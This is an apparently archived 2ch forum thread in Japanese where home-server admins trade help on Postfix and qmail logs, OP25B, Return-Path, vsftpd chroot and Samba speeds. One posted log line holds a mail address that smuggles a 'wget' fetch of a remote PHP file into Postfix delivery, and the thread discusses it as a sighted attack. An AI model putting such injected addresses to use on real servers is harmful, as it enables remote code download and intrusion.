1 :
DNS未登録さん :
2010/05/05(水) 12:29:09 ID:9rQrdM0v
4 :
DNS未登録さん :2010/05/05(水) 15:48:36 ID:aTV2+9x9
すいません、メールの送信設定をいじろうとしていたときに
/var/log/maillogを覗いたら次の様なログがありました。
May 5 15:36:08 localhost postfix/smtpd[11252]: connect from mail.skihk.com[218.103.91.218]
May 5 15:36:08 localhost postfix/smtpd[11252]: NOQUEUE: reject:
RCPT from mail.skihk.com[218.103.91.218]: 554 5.7.1 <
[email protected] >: Relay access denied; from=<
[email protected] > to=<
[email protected] > proto=ESMTP helo=<skiserver>
May 5 15:36:08 localhost postfix/smtpd[11252]: disconnect from mail.skihk.com[218.103.91.218]
ログから解釈すると、外部から中継の要求があったようなのですが
アクセスしてきたサーバーはやはり
スパム関連のサーバーとかだったりするのでしょうか?
あと、こういうのはファイアウォールあたりで弾いてしまうのが適切な対応なのでしょうか?
なんだか初心者ですいません。
>>4 外部から不正中継のアクセスがあったみたいですね。
rejectされているので問題ないでしょう。
こんなのはしょっちゅうなので、気にしなくていいと思うけど
気になるならDNSBLとか設定すればいいんじゃないかな。
>>4 オープンリレーであることを確認しにきてるのか、
オープンリレーであることを期待してるのかのどちらかで、おそらく前者。
postfixならデフォルトではそのようにオープンリレー状態になってないので
その手の心配は無用。
あなたのサーバ宛のメールが218.103.91.218から絶対に送信されない確信があるなら
ファイアウォール等SMTP以前で拒否するのもアリ。
そうでなければもっとソフトな方法を選択する必要がある。
そのIPアドレスは香港なので、自分の場合だと無条件に拒否対象にしてる。
7 :
DNS未登録さん :2010/05/07(金) 10:04:07 ID:pweTGS/w
プライベートIPアドレスの調べ方について質問します。 今まではサーバ機にOSを入れて、その後コマンドでifconfigして調べていました。 しかし、OSを入れる前に調べる方法が無いかと思い、 ググったりしているのですが、どうすればいいかわかりません。 ルーターはヤフーBBから送られてきた物です。
>>7 OSを入れてDHCPクライアントの機能が動いたところでIPアドレスが割り当てられるんだから、
あらかじめ決めてあるんでなければそれより前に知るのは難しいだろうね。
割り当てられる可能性の範囲とかだったら、ルータのマニュアルでも見るしかないんじゃなかろうか。
9 :
DNS未登録さん :2010/05/07(金) 10:40:22 ID:pweTGS/w
なるほど。了解しました。ルーターからはわからなかったので、 一旦、OSをインストールしてifconfigで調べることにします。
自宅サーバーの質問とは思えないな。 このレベルでもサーバが立てられるから不思議。
え、どのIPアドレス振ってるか(話からしてDHCPよね)分からないルータなんてあんの?
というか調べなきゃならないくらいなら最初から固定値にすればいいと思うんだ。
家の中のLAN内にあるPC等でストリーミング再生したり アクトビラ対応TVで再生したりしたいのですが 何をそろえればいいでしょうか?
DLNA
DTCP-IP
16 :
DNS未登録さん :2010/05/09(日) 08:11:37 ID:ceULqr2T
chkconfig httpd on でApache起動できるけど、実行ユーザをroot以外を指定って出来ないのですか?
19 :
DNS未登録さん :2010/05/09(日) 20:25:24 ID:pbTPuodI
DLNA対応の東芝のレコーダ買ったのですが、そもそもDLNAってどうやって 作るのですか?ルーターからそれぞれの機器にLANでつないで、PCにDLNA のソフトか何かをインストールするんですか?全然分からないです・・・
DLNAを何だと思って買ったんだか知らんが、まずお前はAV機器板行け。
>>19 DLNAアダプター買ってこい。話はそれからだ
LAN内部にTVrockの録画鯖があって、Digest認証を設定している。
localhost以外からのアクセスは認証が必要で、LAN内部では普通に認証出来る。
外からアクセスするために、Apacheの公開鯖(CentOS)をリバース串にして以下のような設定をした。
ProxyPass /hoge
http://www.xxx.yyy.zzz:8969/user で、リバース串経由にしたらDigest認証が全く通らなくなったんだけど、
これはApacheの設定ミス?TVrock固有の問題?
Apacheのログでは401が出ている。
TVrockをBasic認証にすると問題は起きない。
>>24 Digest認証を使う理由がセキュリティを高めたいというものであるとすれば、
SSL Proxyを構築したほうが早い。
どうせ自分専用なら証明書も自己署名証明書でOKだし。
AcronisTrueImageみたいなソフトで、BSDのUFS2に対応したのってある? みたいなつーのは、使用領域分だけバックアップできて、 CDやPXEで起動できて、その上でCIFSのドライブに接続できて、 バックアップ元と復元先のHDD容量が違っても問題ないってこと。 最後の条件は必須。
漠然とした質問で申し訳ないんだが
NekosogiFtpdでFTP鯖建てて、友人と共有しているんだけど
「今日●●フォルダに、××ファイル入れておいたよ」と
いちいちメッセンジャーとかメールとかで知らせるのが面倒なんだ。
FTPで使っているフォルダの更新情報を、定期的に自動でメールとか、
何かの手段で指定したアドレスに吐き出させる方法って無いかな?
OS :Windows 7
FTP:NekosogiFtpd
>>27 Tripwire というのがあるが、それほど高機能じゃないものなら perl あたりで簡単に出来るからそれを一定時間ごとにcronなどでまわせばよい。
ファイル数でも監視して、変化したらメールを出す。この程度なら簡単だろ。
>>27 FileWatch というのがvectorにあるね。
>>28 >>27 ありがとう!!
perlで作るか、フリーソフトで便利なものもあるんですな。
参考になりました。
フリーズしてしまったパソコンをリモートから再起動する装置はありませんか
嫁は電源を切る装置だな。
しかも自動的にな
こんなログがあった(実際は一行だけど長すぎて書き込めないので二行にした)。
May 14 10:28:31 debian-server postfix/local[20210]: E02311D37F: to=<root+:|wget
http://***.in/**.php@ △△.jp>,
orig_to=<root+:|wget
http://***.in/**.php >, relay=local, delay=0.92, delays=0.91/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
やりたいことはわかるにしてもこんなんでwegetが実行されてしまうものなのか?
ってか俺のサーバーから実行してしまってるのか・・・?そんな気配は無いんだけど・・・
検索しても出てこん・・・*部分を原文で検索したら英語サイトばっかでよくわからんかった。
普通はそれで何か実行されることは無いが、環境もまともに書かずに 答えを得られると思ってる時点で回線切ったほうがいいと思う。
>>38 環境は3LDKで貧乳ながらもかわいい嫁です。
>>40 それは家について聞いてるのか、それとも嫁について聞いてるのか
ファイルサーバーの転送速度について質問。 CentOS+SambaとWindows Server 2008で比較した場合、転送速度が速いのはどっちなのか分かりますか? 書き込み、読み出しそれぞれで
>>42 クライアントのWindowsが何かにもよって若干変わるが、読み出しに関してはたぶん2008の方が早い。
書き込みは気にしたことないから知らん。
45 :
DNS未登録さん :2010/05/15(土) 08:22:58 ID:D3HZp2B3
サクセスしちゃってるなら感染。おめでとう。
ヽ( ^ω^)ノ サクセス!
サクセスしちゃったのね
>>42 以前ブログ用にうpしたやつなので参考までにどうぞ。
・w2k3(4コア/8GB/250GB+1TBの単発)
・CentOS5+smb(4コア/4GB/1TB×2のRAID1)略してSMB
・w2k8(8コア/24GB/300GB×6のRAID6)
・XP(2コア/2GB/1TBの単発)
・Terastation(500GB×4のRAID5)略してTS
上記環境でXP/w2k3→SMBは40MB/s、w2k8→SMBは80〜120MB/sと桁違い。
SMB→XP/w2k3は40〜45MB/s、w2k8は50〜55MB/sくらい。
XP/w2k3→w2k8は40〜45MB/s、w2k8→XP/w2k3は38〜42MB/sでした。
w2k8→TSは18〜20MB/s、XP/w2k3→TSは13〜15MB/s、
TS→w2k8は25〜27MB/s、TS→w2k3/XPは20〜23MB/s
7は使ったことが無くてすいません。
3〜4回はテストしてるので数字は安定してますがw2k8だけ異常ですね。
>>44 まあ中二病的発想だろうね
三年生ともなれば経済ってもんが大まかにでも分かって来て個々人が自分自身の為に精一杯頑張る事が
最も社会(彼らは地球・世界・市民といった表現が好きなようだが)の為になるって事に気付くもんだけど
51 :
DNS未登録さん :2010/05/15(土) 23:49:08 ID:PfeKvfZa
UNIX板で質問したんですが、スレ違い・板違いと言われて誘導されてきました
初心者質問なんですが、maillogの見方について質問させてください
440 May 14 04:40:57 localhost postfix/qmgr[19722]: A30BC1A398: from=<
[email protected] >, size=493, nrcpt=1 (queue active)
441 May 14 04:40:57 localhost postfix/qmgr[19722]: 193D71A39C: from=<
[email protected] >, size=493, nrcpt=1 (queue active)
442 May 14 04:40:58 localhost postfix/smtp[20590]: A30BC1A398: to=<
[email protected] >, relay=smtp06.isp.ne.jp[143.000.14.5]:25,delay=29830,
delays=29830/0.01/0.07/0.03, dsn=5.0.0, status=bounced (host smtp06.isp.ne.jp[143.000.14.5] said: 553 mail.xxSAMPLExx.com does not exist (in reply to MAIL FROM command))
・440,441のfromとして指定されているメールアドレスは、サーバのどの設定ファイルに書いてあるんでしょうか?
Postfixやapacheのhttpd.conf, php.iniなど関連ありそうな設定ファイルを確認したんですが見つかりませんでした
ゾーン設定ファイルにもapache@〜なんて書かなかったし。
もしかして、xxSAMPLExx.comのapache(=apacheの実行ユーザ)から送られたメール(キュー)ってことですか?
・442は、mail.xxSAMPLExx.comというサーバが見つからなかったから、そんなアヤシイメールは受け取れないってことで
ISPのSMTPサーバに拒絶されたってことでしょうか? だとしたら、ドメインとって業者のDNSに登録しなきゃ送信できないんでしょうか?
あと、OP25Bはプロバイダが自分のネットワークからの不正なメールを配信しないための手続きですよね
ということは、ホスティングのレンタルサーバを借りた時は、考慮しなくても良いのでしょうか(VPNなど)
ホスティング事業者によっては同じ対策をとってるんでしょうか?
長文ですみませんが、ご意見よろしくお願いします
>>51 正直肝心な部分が抜けてるから何とも。つかpostfixスレ行けよ。
で、そのメールはそもそもどこから来たんだ? お前の鯖か? 外からだったら見事なオープンリレーだが。
あとOP25Bに関してはググれ。お前が何の「考慮」の話してるのかもわからんし。
>>51 スレ違い以前にその程度の知識で鯖立てるのもどうかと思うが。
440,441の解決方法はプログラム経由でメールを送信する際に
差出人を設定してないのが原因だと思う。使ってる関数のマニュアルを見るんだ。
442はケースバイケースだけど、
apacheが付いてるアドレスはSPAMでもよく使われるので単に拒否してる場合もあるので
リターンパスを設定していればリレーされるかもしれない。
リターンパスを設定しても通らないのであれば
ISPがそんなドメインなんてホストしてないよって拒否してるのではないかと。
OP25B自体は送信元が動的IPアドレスかつ送信先が25番ポートの通信をブロックする内容。
レン鯖を使った場合はサブミッションポートで調べるといい。
通信経路を暗号化するって理由で、職場によってはVPNを使うケースもあるが
25番ポートがブロックされるからという理由でVPNを提供してる業者はいないと思うよ。
54 :
42 :2010/05/16(日) 03:30:14 ID:???
>>43 Solarisは使ったことがないんだ。すまない。
>>44 ありがとう。
>>49 本当にありがとう!
クライアントをXPと想定すれば
サーバーがSMBの場合は、書き込みは40MB/sで、読み出しが40-45MB/s
w2k8の場合は、書き込みが40-45mb/sで、読み出しが38-42mb/sか
これなら、保守が楽なw2k8にするかな。
それにしても、w2k8とsmbの速度は異常すぎる。
7ならそれぐらい出るということなのかな。そしたら、SMB一択なんだけどね。
OCNだと総量制限30GB/dayがあるんですが、自宅鯖立てるなら確実にアウトですか?
56 :
51 :2010/05/16(日) 06:18:10 ID:PgG9sjpU
>>52 ありがとうございます、自分が送信したメールのログになります。
すみません、maillogの見方の質問なので、MTAに関係ないここで質問しました
>>53 ありがとうございます
>差出人を設定してないのが原因だと思う。使ってる関数のマニュアルを見るんだ
送信者のアドレスは指定してあります。
$mail = new Zend_Mail();
$mail->setBodyText('This is the text of the mail.');
$mail->setFrom('
[email protected] ', 'Some Sender');
$mail->addTo('
[email protected] ', 'Some Recipient');
$mail->setSubject('TestSubject');
$mail->send();
なので、自分もfromは「
[email protected] 」になるのかと思ってたんですが…
指定した送信者アドレスと違うものがfromとして扱われることや理由があるんでしょうか
いろいろ詳しい説明ありがとうございます。
>>56 一応聞くがhttpd.conf内のServerAdminはちゃんと設定済み?
一時凌ぎだったらとりあえず/etc/postfix/canonicalでfrom書き換えちゃうのもありだけど…
58 :
51 :2010/05/16(日) 08:12:56 ID:PgG9sjpU
>>58 /usr/sbin/sendmail 携帯メアド </etc/hosts
とやって、ログ見てみろ。
>>58 単にPHPからメールを送信する時にReturn-Pathが設定されてないから、apache@みたいなメアドになってるんじゃない?
送信元のメアドは大きく分けて二つある。
メールヘッダの送信元と、メール本体の送信元。
こんな感じで変更してみたら?
$tr = new Zend_Mail_Transport_Sendmail('
[email protected] ');
Zend_Mail::setDefaultTransport($tr);
62 :
51 :2010/05/16(日) 11:29:38 ID:PgG9sjpU
>>60 ,61
ありがとうございます。
今調べたらfromに入ってるメールアドレスは /etc/postfix/main.cf のmyhostnameの値でした
今からそれぞれ言われた部分の確認してみます
>>62 つかもうWebProg板の範疇だと思う。
>>54 w2k8はXPでキャプチャしたやつをエンコーディングするために使ってるけど、
何度試しても同じような数字なんだよね。早いから便利と言えば便利だが。。
SMBとw2k8の件はHW-RAID搭載なのでキャッシュしてるのかな?とか勝手に解釈してる。
>>55 固定IPアドレスの利用も検討されては?
こっちは400GB/dayくらい使っても文句言われない。難点は銭がかかるだけ。
>>58 リターンパスと書こうとして差出人って書いてたわ。61フォローサンクス。
"additional_parameter apache"あたりでぐぐってみると詳しく載ってるはず。
>>64 自宅鯖自体が曖昧な位置付けなんだろうね。
一人管理だからUNIX/LINUX/通信技術/自作/ハードなんでもござれ、延長でPGみたいな。
建前では仕事絡みの話NGだけど、中小企業での管理者の要求範囲に近いよね。
L3・FW・データセンタを除けば。
自宅サーバーで400GB/dayってどんな用途に使ってるんだ?
>>66 400GB使ってるやつは自宅鯖用じゃなくて遠隔地バックアップで使ってるやつだね。
自宅→実家にフルバックアップしてる。
昔日曜日にフルバックアップしてその他増分データでやってたら痛い目をみたからな・・・。
同一ISPじゃないと経路が遠くて転送速度が出ないのが唯一の難点。
自宅鯖で使ってる回線は相変わらずしょぼいよ。
SAの研究用でSPAMを大量に受け取ってるので、
setting for your mailbox are changed絡みで転送量が若干増えたが。
68 :
51 :2010/05/16(日) 16:56:31 ID:PgG9sjpU
>>61 そのコードを追記したら送信できました、ありがとうございました
ホントに、プログラム板の範疇とかぶって来ていて申し訳ないんですが確認させてください
この追加したコードは Return-Pathを付加したわけですよね?
今回Return-Pathを加えたことで携帯向けのテスト送信も成功したんですが、(今までは失敗してました)
Return-Pathは必須で、今までその設定をしていなかったから失敗していたと言うことでしょうか?
何度もすみません、ありがとうございました
乙。 自分にはリターンパスが設定されていなかったというより リレーしているISP側がapache@で始まるメールを弾いてるように見えた。 確認方法としては、リターンパスと差出人に以前付いてたように apache@hogehogeって設定してリレーされるか確認してみるといいかも。
70 :
51 :2010/05/16(日) 18:30:15 ID:???
どうもです。解決しました。
要するに、Return-Pathが未設定もしくは存在しないドメインのメアドの場合、
ISPサーバは配信拒否するようでした。
昔はReturn-Pathがカラだったり、適当なドメインのものでも通ってたけど
そういう迷惑メール業者がいて今の対応になったみたいです。
オライリーのPostfix本にも書いてなかったんでハマってしまいました、
ISP事業者によって違うだろうし、現実の変化の方が早すぎるんですね
>>69 自分のISPは、apacheで始まるものもOKなようです。
本当にどうもありがとうございました。
録画機として1台組んだのですが、ホームネットワークの設定をしたのに ネットワークのところに、録画機のフォルダのアイコンがないことがよくあります。 たいていは、録画機のマウスをちょっと動かして、1代目のフォルダを「最新の情報に更新する」 を実行すると、フォルダのアイコンが表示されたりします。 要因は録画機がスリープ状態に入っているからかと思いますが、マウスを動かしても接続されないこともあります。 1台目はWindows7 home 録画機はWindowsXP pro ルータはバファロー BBR-4HGです モデム---ルータ---PC1 ---PC2 という感じで接続しています
質問を忘れました どうしたらアイコンが常時表示されるようになるのでしょうか 設定にミスがあるのでしょうか あとルータにPC1,PC2(録画機)を繋げています PC1,2は直接は繋がっていません
>>72 設定というか設計にミスがあるな。その構成にはサーバがいないじゃん
PC1, PC2 がそれぞれ適当な間隔で自分の存在をLANにブロードキャストしている情報を
お互いが適当に拾って、「どうも近所に別のノードがいるらしい」というかんじで
動いているからそうなる。
面倒くさければもう一台 Windows Home Server でもいれとけ。
>>71 とりあえず要因の答としては「スリープさせてるから」
1台目から見ていなくなっちゃってるんだからそりゃ仕方ない。
ネットワークプレースに登録すれば常時見えるようにはなるけど、それじゃダメかい?
>>75 何か色々勘違いしてるような気がするが・・・。
とりあえず前半部分にある「やりたいこと」を実現するには内向きDNS立てるなり
hostsファイル書くなりの運用は必須。
>>76 んな事も無い。
普通に外向けDNSでローカルアドレスをAレコードで記述すれば良い。
勿論DDNSでも可能。
>>77 >>75 >hostsファイルやルーターのDNSをいじらずに出来る方法ってあるのでしょうか?
ああ悪い、
>>78 は無視してくれ
文章推敲しようとしてたらミスった上に何書こうとしたか忘れた
結局DNS用意するかhosts使うかしかないって意味では
>>76 も
>>77 も変わらんw
81 :
DNS未登録さん :2010/05/20(木) 16:56:48 ID:L9v18q0r
vsftp(2.0.5-16.el5_4.1)のchroot設定について教えてください vsftpd.confは以下で、 chroot_local_user = YES chroot_list_enable = YES chroot_list_file = /etc/vsftpd/chroot_list /etc/vsftpd/chroot_list は userA だけが記入されています。 この状況でサーバと同じローカルネットワーク中のターミナルからftpログインすると、 userA 上位階層に移動できる(ftpログイン時にpwdで /home/userA) userB 上位階層に移動できない(ftpログイン時にpwdで / ) 本の通りだとchroot_listに掲載されているuserAが上位階層に移動できなくなるはずです、 何が原因なんでしょうか? OSはCentOS5.5です。
chroot_local_user=NO
83 :
DNS未登録さん :2010/05/20(木) 18:12:54 ID:L9v18q0r
>>82 ありがとうございます
しかし、その変更を加えたら、/etc/vsftpd/chroot_listリストに載ってる
ユーザーも載っていないユーザーも両方とも上位階層に移動できるようになりました。
他のユーザー関係の設定は
userlist_enable=YES
userlist_deny=YES
userlist_file=/etc/vsftpd/user_list
としていますが、関係ないですよね(userAもuserBもuserlist_fileに載ってません)
84 :
DNS未登録さん :2010/05/20(木) 19:10:48 ID:L9v18q0r
>>82 ごめんなさい、勘違いしてました! それでちゃんと動作しています!
ちょっと理解がよくできてない。
1)chroot_list_enablesをYESにしたとき、chroot_list_fileが「リスト」として有効になる
2)そのリストとしての意味は、chroot_local_userのYES/NOによる
3)chroot_local_userがYESなら、chroot機能が有効で、上位階層に移動可能なユーザーのリスト
4)chroot_local_userがNOなら、chroot機能が無効で、上位階層に移動できないユーザーのリスト
ってこと? なんだかわかりづらいな〜
>>84 その認識であってるよ。
vsftpd.confのマニュアル内chroot_list_enable項目にも書かれてる。
86 :
DNS未登録さん :2010/05/20(木) 21:35:04 ID:eLsRWFjJ
>>85 よかった、一応英語読んだんですが、いろんなサイトと見比べてるうちに混乱してました
ありがとうございました
>>75 Windows限定(?)でよければNMBで名前を解決して何とかなるかもしれない。
自分ではまったく確認してないので、後の検証は任せる。
89 :
DNS未登録さん :2010/05/22(土) 07:26:41 ID:6h4v5Qxo
質問させてください OSはCentOS 5.3です。 PHP、SQLiteをインストールしたのですが、 PHPからsqlite_openしてもうまくいきません。 プロンプトからはsqliteが起動するので、インストールはできているみたいなのですが、 何か原因となりそうなものをアドバイスいただけないでしょうか?
92 :
89 :2010/05/22(土) 09:39:55 ID:6h4v5Qxo
すみません。 エラーはundefined functionです。 プログラム自体は他で動かしていた実績のあるものです。 PHPというより鯖の設定の問題だと思われるので、こちらに質問させていただきました。 パスとか権限の問題かなとも思うのですが・・・
php.iniいじってないとかそんなオチを予想
94 :
DNS未登録さん :2010/05/22(土) 15:43:21 ID:BLbZG8rT
すみませんが教えて下さい。 WinXP+ANHTTPDで自宅サーバーを作ってみました。 しばらくの間、DiCEで取得?したアドレスで公開していたのですが、今日、お名前.comで独自ドメインを購入しました。 ところが、お名前.comでの設定がわかりません。 ネームサーバー情報というものを入力しなければいけないようなのですが、何を入力すれば良いのか 分かりません。試しにIPアドレスを入力したらそれはダメですと出ました。 どなたかよろしくお願いします。
>>92 いやだからさ、鯖の設定つってもphpの話に変わりないじゃんよ。
あとそのエラー文だけでどうしろというのだ?
>>94 そもそもDiCEでどこのDNS使ってるのさ?
97 :
DNS未登録さん :2010/05/22(土) 17:07:23 ID:JEAEPcXA
質問です。 当方 ODdebian
98 :
DNS未登録さん :2010/05/22(土) 17:09:59 ID:JEAEPcXA
失礼しました。 OS: debian lenny メール: qmail でメール鯖を立てました。 LAN 外から鯖につなげて受信はできるのですが送信ができません。 ためしに rcphost を削除したのですが送信ができないようです。 基本的なところでつまずいている可能性があるのですが、 例えばどのようなところをチェックすればよろしいでしょうか? ご教示お願い致します
100 :
DNS未登録さん :2010/05/22(土) 17:36:42 ID:JEAEPcXA
>>99 さっそくのレスありがとうございます。
ポート587に変更すればできるのかどうかといった問題なのでしょうか?
ためしに /var/qmail/bin/qmail-inject でテストメールを外部に送ってみた
結果ログです。
May 22 17:32:09 hoge qmail: 1274517129.533963 new msg 4718606
May 22 17:32:09 hoge qmail: 1274517129.534049 info msg 4718606: bytes 247 from <root@私の鯖.com> qp 17724 uid 0
May 22 17:32:09 hoge qmail: 1274517129.542162 starting delivery 1: msg 4718606 to remote 外部メールアド@yahoo.co.jp
May 22 17:32:09 hoge qmail: 1274517129.542271 status: local 0/10 remote 1/20
101 :
100 :2010/05/22(土) 17:38:05 ID:JEAEPcXA
ちなみにポートは 25 のままで行っております。 メーラは iPhone のデフォルトで入ってるメーラを使っております。
103 :
100 :2010/05/22(土) 17:50:31 ID:JEAEPcXA
>>102 ハ _
___ ‖ヾ ハ
/ ヽ ‖::::|l ‖:||.
/ 聞 え | ||:::::::|| ||:::||
| こ ? | |{:::::‖. . .||:::||
| え | _」ゝ/'--―- 、|{::ノ!
| な 何 | / __ `'〈
| い ? ! /´ /´ ● __ ヽ
ヽ / / ゝ....ノ /´● i
` ー―< { ゝ- ′ |
厶-― r l> |
∠ヽ ゝ-― `r-ト、_,) |
レ^ヾ ヽ>' ̄ LL/ 、 /
.l ヾ:ヽ ` 、_ \\ '
l ヾ:ヽ ト`ー-r-;;y‐T^
| ヾ `ニニ「〈〉フ /‖. j
105 :
100 :2010/05/22(土) 18:07:06 ID:JEAEPcXA
,,,..-‐‐‐-..,,, /::::::::::::::::::::::::ヽ _,..-‐‐-..,,, l::;;-‐‐-:;;::::::::::::ヽ//-‐,,__ /:::::::::::::::::::::ヽ l:l ヽ:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ ヽ / :::::::::::::::::::::::::::::::::::::;-'^~~^'‐;;:l ~ヽ/ ::::::::::::::::::::::::::U::ヽミ .ll / / ̄^ヽ ::::::::::::::::::::::U:::ヽ ,.ノ ∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧ / | ・ .| :/ ̄^ヽ:::::::l'^~ .< ‐/-,, ヽ,_,,ノ | ・ |:::::::l < l ~^'' `‐' ヽ.,_,,ノ :l < | ヽ / ̄ ̄\ '''l^^~~~ / ̄ ̄ヽ -‐‐‐--l- < | ヽ __ | ヽ、 ,,,, | |||!|||i||!| | ~^'‐..,,_/ < / \ |ノ ―――― / / (:::::} | | |ll ll !!.| | ,,,, イ~''' < / \ 丿 アアァァ | l: ~~ | |!! ||ll| || | {:::::) ::l .< ● l: | | ! | l ~~ l < l、 ヽ`ニニ'ノ ,l> V V V V V V V V V V V V V V V V VV V V V V /^‐-,,____,,,,,,,,..................,,,,,,,__,,,.--ヽ ~‐‐'~ ^'‐‐~
106 :
100 :2010/05/22(土) 18:07:59 ID:JEAEPcXA
とううかわからない方はご遠慮くださいませんか? 煽り AA を貼ったのは謝ります。 もしくはあなた後存知なのではないでしょうか?
>>105 おまえが壮絶に馬鹿な事はよく分かったわw
AA貼るなキモイ。
>>106 顔真っ赤だなwwwwwww
覆水盆に返らずって知ってるかwwwwww切れたら負けだろwww
Linux、UNIX、WebProg板に行っても無駄だぞ。俺の庭だwwwwwwどうするよwwwwww
109 :
99 :2010/05/22(土) 20:02:17 ID:???
>>101 OP25Bなんだから25のままでISP外に通るわけないだろうよ。AAまで貼って何やってんだお前は。
ISPのメル鯖に転送しろよ。
誰だよこんなアホ連れ込んできたのは
今日、きんでんから5/31の15:30〜17:00で停電しますってチラシ入ってた。 自家鯖はどうしたらいいだろ?平日だから、鯖の前でモニタもできないし。 仕事中にリモートする暇もないし。
朝から落としときゃいいじゃん
いや、DNS立ってるしメール鯖も立ってるし、使ってる人俺一人じゃないし、
別に1日くらい止まってたって困る程の鯖でもあるまい? 困るくらいならそもそも自宅鯖にしてるのがおかしい。
メールやWEBはともかくコンテンツDNSは自宅に置くもんじゃないな。
15分ぐらいならUPSでなんとかなるかとおもうんだけど 正味の停電時間をきんでんにかくにんせなあかんな。 >114 いや、そのりくつはおかしい。(AA略
アホがいると聞いて来たけど乗り遅れたか!
>>111 消費電力と相談だが1時間半程度なら1500VA程度のUPSで何とかなるんじゃね。
エアコンないと厳しい環境なら少し難しいかもしれんが。
仕事で使う鯖と違ってUPS直列繋ぎとか無理な事ができるのが自宅鯖の醍醐味。
>>117 その心意気を否定するつもりは無いが、正味にアンタがおかしいよw
何してるんだか知らんがそこまでクリティカルならもうちょっと自衛策取っとけ。
で、何VAのUPSに何Wの鯖繋いでるのさ? 電池ヘタってると3分もたんぜ。
1500VAで1.5hって鯖の消費電力どんだけ低いんだよw
100W程度なら1hは軽くもつでそ
>>120-121 うむ。1500VAの新品UPSだと300〜400Wくらいで30分程度は持つよ。
UPS以外の方法としての自動復帰の話にすると、
BIOSで電源切断後の動作をlast stateかalways onにすればいい。
停電時にHDDが逝ったりするリスクもあるから、
UPSである程度の停電でも落ちないように保険を取るか、
出かける前にBIOSでalways on設定にして鯖を停止、
電源が止まった後に電源供給されると自動的に立ち上がる設定にするのも手。
仕事の話だけど、法定点検で長時間止まるって聞いてデータ保護のため予めシャットダウンしたら、
UPSが見事耐えてくれて鯖が起動せずクレームになったことあるw
とっぱらえる制約はとっぱらおうぜ。 まず、会社休め。
>>123 DNSはセカンダリーがあるだろうし、mailは復旧すれば再送信される。
126 :
DNS未登録さん :2010/05/23(日) 10:46:24 ID:47YYRzsB
CTUの設定で詳細設定で 1.IP:xxx.xxx.xxx.xxxサーバーのWAN->LAN80番ポートのみ 2.WAN->LAN通信全部許可 という設定になっているんですが、かんたん設定 低[初期設定]を詳細設定でするとどういった感じになるのでしょうか?
せめてCTUの型番くらい書こうぜ
128 :
100 :2010/05/23(日) 14:51:25 ID:ZBJo7cFl
すいません 教えていただけませんか?
>>128 OP25Bの対策は、submission(587)を使えば良いという訳ではない。
プロバイダーにより方法が違うからプロバイダーの案内ページをよく読み分からなければ問い合わせ。
一番簡単なのは固定IP契約をする事。
130 :
DNS未登録さん :2010/05/23(日) 15:32:15 ID:Sm7LiCtD
OSはWin server 2008 r2です。 ネット環境はNTT西日本フレッツ光プレミアム 今自鯖で身内とECOのエミュたててるんですが、 友人はINすることはできるのですが自鯖からINすることが出来ません。 ルータからPC2台繋げてるのですがどちらからもINすることができず、 hostsファイルの編集でもだめでした。 ルーティングの設定でなんとかなるらしいのですが、 ググってみても詳しい方法がわからずこれもダメでした。 アドバイスください、お願いします。
131 :
100 :2010/05/23(日) 15:40:47 ID:ZBJo7cFl
>>129 ありがとうございます。
固定IPの件ですが、私は1個持ってます。
現在PCが5台あるので、ルータで静的マスカレード設定済みです。
ポートは現在ルータ・鯖ともに 25 番をあけております。
これって完璧 OP25B されてるってことでしょうか?
昨日の祭りに乗り損ねたがまた来てくれて嬉しいよ。
>>131 固定IPアドレスを取得していてもOP25Bを実施しているプロバイダは多数存在するよ。
自宅鯖でよく使われるCyberBBは固定IPアドレス1個でもブロックされている。
自分は法人向けの/29で契約してるからブロック対象外だが。
簡単な方法は適当な鯖に25番ポートで接続するかどうかを試してみる方法。
digでyahoo.co.jpのMXレコードを引っ張ると以下の内容なので、telnetで25番ポートを指定して繋げるか確認するといい。
yahoo.co.jp. 900 IN MX 10 mx3.mail.yahoo.co.jp.
yahoo.co.jp. 900 IN MX 10 mx5.mail.yahoo.co.jp.
yahoo.co.jp. 900 IN MX 10 mx1.mail.yahoo.co.jp.
yahoo.co.jp. 900 IN MX 10 mx2.mail.yahoo.co.jp.
$ telnet mx2.mail.yahoo.co.jp 25
Trying 114.111.83.217...
Connected to mx2.mail.yahoo.co.jp (114.111.83.217).
Escape character is '^]'.
220 mta517.mail.kks.yahoo.co.jp ESMTP YSmtp service ready
と帰ってくればOP25Bはされていない。
Trying 114.111.83.217...でずっと止まって何も帰ってこなければOP25Bがされている。
133 :
100 :2010/05/23(日) 16:22:04 ID:ZBJo7cFl
>>132 本当にありがとうございます。
無事?OP25Bされていることが確認できました。
ということはルータと鯖のポート解放をすることが先決ですね。
あとは・・・・ qmail の設定をするって感じでしょうか?
>>133 OP25Bされている場合はポート解放じゃ無理だよ。
自分の環境が問題じゃなくてプロバイダ側が外向き25番ポートの通信を全部遮断してる。
OP25Bされている環境で送信する場合には、
・法人向けの固定IPアドレスを取得してOP25Bを解除してもらう
(確実な方法だがお金がかかるのとIPアドレスが変わる)
・ISPのサーバーを経由して送信する
(ただし全てのISPが対応しているわけではないので注意)
・qmailをサブミッションポートに対応させる
(送信先鯖がサブミッションポートに対応していないとダメなので確実な方法ではない)
ここまでヒントを出したから後は自分でどうするか考えてくれ。
135 :
100 :2010/05/23(日) 16:40:04 ID:ZBJo7cFl
>>134 非常にありがたいです、ありがとうございます。
ただ今ルータと鯖のポート解放を行い、 qmail での設定も
submission ポートで行うよう設定いたしました。
試しに自分の Yahoo メールに送信してみました。
送信完了したにも関わらず Yahoo にはメールが届いていない模様です。
もしかして
>>134 さんが仰ってた
>・qmailをサブミッションポートに対応させる
> (送信先鯖がサブミッションポートに対応していないとダメなので確実な方法ではない)
に該当しているのでしょうか?
もしそうだったら頑張るしかないですね
136 :
100 :2010/05/23(日) 16:56:31 ID:ZBJo7cFl
なんだかメールすらとどかなくなったんですがこれってどんな現象なんでしょう? 鯖のどっかにかくれちゃってるんでしょうか?
137 :
126 :2010/05/23(日) 17:06:34 ID:47YYRzsB
>>127 型番は2004W「S」になります。
お分かりになられる方がおられたらよろしくお願いいたします。
